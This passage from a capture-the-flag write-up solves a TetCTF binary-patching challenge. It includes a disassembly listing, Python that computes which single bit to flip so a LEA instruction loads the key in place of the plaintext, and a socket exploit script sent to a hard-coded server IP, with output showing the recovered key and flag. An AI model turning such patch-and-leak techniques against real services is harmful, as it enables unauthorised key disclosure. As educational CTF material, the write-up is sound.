001011c5 48 89 c6                     MOV    RSI=>plaintext,RAX
001011c8 bf 01 00 00 00               MOV    EDI,0x1
001011cd e8 8e fe ff ff               CALL   <EXTERNAL>::write                ssize_t write(int __fd, void * _
001011d2 b8 00 00 00 00               MOV    EAX,0x0
001011d7 48 8b 55 f8                  MOV    RDX,qword ptr [RBP + local_10]
001011db 64 48 2b 14 25 28 00 00 00   SUB    RDX,qword ptr FS:[0x28]
001011e4 74 05                        JZ     LAB_001011eb
001011e6 e8 85 fe ff ff               CALL   <EXTERNAL>::__stack_chk_fail     undefined __stack_chk_fail()
                                      -- Flow Override: CALL_RETURN (CALL_TERMINATOR)
                       LAB_001011eb                                  XREF[1]:     001011e4(j)
001011eb c9                           LEAVE
001011ec c3                           RET
If the LEA at 001011be can be made to load key instead of plaintext, the write that follows should output key.
Try rewriting the "4b" in "4b 3e 00 00" to "5b". To do this, give plaintext_hex as the hex representation of any 16-byte string, i_str as 4545 (= 0x11c1), and j_str as 4.
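As an added example (not the writeup's own code), the arithmetic behind those three values: resolve the RIP-relative target of the LEA at 001011be, find the single bit that moves its displacement from plaintext to key, and apply the same content[i] ^= (1 << j) mutation the server performs on a constructed stand-in for the binary. It assumes Ghidra's image base of 0x100000, that .text file offsets equal the virtual address minus that base, and that .data virtual addresses sit 0x1000 above their file offsets; the i value 0x11c1 and the key/plaintext addresses in the listing are consistent with all three.

```python
import struct

GHIDRA_BASE = 0x100000        # image base Ghidra used for the PIE (assumption from the listing)
OFFSET_PLAINTEXT = 0x4010     # file offsets the server writes pt and key to (from the challenge)
OFFSET_KEY = 0x4020
DATA_VADDR_DELTA = 0x1000     # .data vaddr = file offset + 0x1000 for this binary (assumption)

# LEA RAX,[plaintext] at 001011be: 48 8d 05 <disp32>, disp32 = 0x3e4b (from the listing)
LEA_VADDR = 0x1011be
LEA_BYTES = bytes.fromhex("488d054b3e0000")


def rip_target(insn_vaddr: int, insn: bytes) -> int:
    """Target of LEA r64,[rip+disp32]: address of the next instruction + signed disp32."""
    assert insn[:2] == b"\x48\x8d" and len(insn) == 7, "not a 7-byte RIP-relative LEA"
    disp = struct.unpack_from("<i", insn, 3)[0]
    return insn_vaddr + len(insn) + disp


def single_bit_flip(insn_vaddr: int, insn: bytes, delta: int):
    """(i, j) such that XORing bit j of file byte i moves the LEA target by delta.

    Returns None when old and new displacement differ in more than one bit,
    because the server performs exactly one XOR. i is a file offset, which is
    how the server indexes content.
    """
    old = struct.unpack_from("<I", insn, 3)[0]
    new = (old + delta) & 0xFFFFFFFF
    diff = old ^ new
    if diff == 0 or diff & (diff - 1):        # zero or more than one differing bit
        return None
    bit = diff.bit_length() - 1
    # bytes 0..2 are REX.W, opcode, ModRM; disp32 starts at byte 3, little-endian
    i = (insn_vaddr - GHIDRA_BASE) + 3 + bit // 8
    return i, bit % 8


def server_checks_pass(content_len: int, pt: bytes, i: int, j: int) -> bool:
    """The validation the server applies before mutating the binary (from the overview)."""
    return len(pt) == 16 and 0 <= i < content_len and 0 <= j < 8


def apply_flip(content: bytes, i: int, j: int) -> bytes:
    """content[i] ^= (1 << j), exactly as the server does it."""
    buf = bytearray(content)
    buf[i] ^= 1 << j
    return bytes(buf)


def demo():
    """Constructed stand-in for encrypt: zero bytes with the LEA placed at its file offset."""
    lea_off = LEA_VADDR - GHIDRA_BASE
    fake_binary = bytes(lea_off) + LEA_BYTES + bytes(OFFSET_KEY + 16 - lea_off - 7)
    i, j = single_bit_flip(LEA_VADDR, LEA_BYTES, OFFSET_KEY - OFFSET_PLAINTEXT)
    assert server_checks_pass(len(fake_binary), b"a" * 16, i, j)
    patched = apply_flip(fake_binary, i, j)
    new_target = rip_target(LEA_VADDR, patched[lea_off:lea_off + 7])
    return i, j, new_target


if __name__ == "__main__":
    i, j, tgt = demo()
    print(f"i={i} (0x{i:x}), j={j}, LEA now points at 0x{tgt:x}")
```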
#!/usr/bin/env python3
import socket


def recvuntil(s, tail):
    # Read one byte at a time until the terminator appears; stop if the peer closes.
    data = b''
    while True:
        if tail in data:
            return data.decode()
        chunk = s.recv(1)
        if not chunk:
            raise EOFError('connection closed before %r was received' % tail)
        data += chunk


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('139.162.24.230', 31339))

# Any 16-byte plaintext; the flip at file offset 0x11c1 bit 4 turns 0x4b into 0x5b
plaintext_hex = ('a' * 16).encode().hex()
i_str = str(0x11c1)
j_str = str(4)
ans = ' '.join([plaintext_hex, i_str, j_str])
print(ans)
s.sendall(ans.encode() + b'\n')
# With the patched LEA the binary writes key instead of the ciphertext
data = recvuntil(s, b'\n').rstrip()
print(data)

# Send the recovered key back to get the flag
key_hex = data
print(key_hex)
s.sendall(key_hex.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
The result of running it is as follows.
61616161616161616161616161616161 4545 4
586d1c9f1564fa19976afad8b3e7d21e
586d1c9f1564fa19976afad8b3e7d21e
TetCTF{fr0m_0n3_b1t_fl1pp3d_t0_full_k3y_r3c0v3ry}
TetCTF{fr0m_0n3_b1t_fl1pp3d_t0_full_k3y_r3c0v3ry}